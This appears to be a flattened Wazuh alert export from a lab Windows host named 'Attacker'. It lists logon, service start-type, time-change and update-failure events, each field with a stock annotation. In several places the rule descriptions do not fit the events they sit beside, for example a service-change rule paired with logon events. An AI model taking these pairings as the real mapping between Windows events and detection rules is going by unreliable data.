decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:52:30.5148874Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43500 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14292 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533895.200065 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:46:35.8478096Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2935 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533895.201877 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:52:32.6925669Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43508 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 11096 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533896.209215 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4616 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12288 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:55:16.5362324Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43510 Incremental log record number – handy for timeline order.
data.win.system.processID: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 12620 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The system time was changed.
Subject:
Security ID: S-1-5-19
Account Name: LOCAL SERVICE
Account Domain: NT AUTHORITY
Logon ID: 0x3E5
Process Information:
Process ID: 0x1c48
Name: C:\Windows\System32\svchost.exe
Previous Time: 2025-04-17T16:55:16.492136900Z
New Time: 2025-04-17T16:55:16.516484900Z
This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-19 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.previousTime: 2025-04-17T16:55:16.4921369Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.newTime: 2025-04-17T16:55:16.5164849Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 0x1c48 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows System error event Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61102 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'system_error'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533896.212420 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-WindowsUpdateClient No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {945a8954-c147-4acd-923f-40c45405a658} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 20 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 13 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000028 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:47:27.8984342Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2941 Incremental log record number – handy for timeline order.
data.win.system.processID: 9648 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14168 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Installation Failure: Windows failed to install the following update with error 0x80073D02: 9NZKPSTSNW4P-Microsoft.XboxGamingOverlay." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.errorCode: 0x80073d02 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.updateTitle: 9NZKPSTSNW4P-Microsoft.XboxGamingOverlay No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.updateGuid: {c6a13812-e71e-4775-86f7-c7f3e4982a80} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.updateRevisionNumber: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.serviceGuid: {855e8a7c-ecb4-4ca3-b045-1dfa50104289} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533896.214327 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:55:16.6963122Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43511 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8104 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533899.221663 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:51:40.0278198Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2945 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 11352 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Windows Modules Installer service was changed from demand start to auto start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Windows Modules Installer No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: TrustedInstaller No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
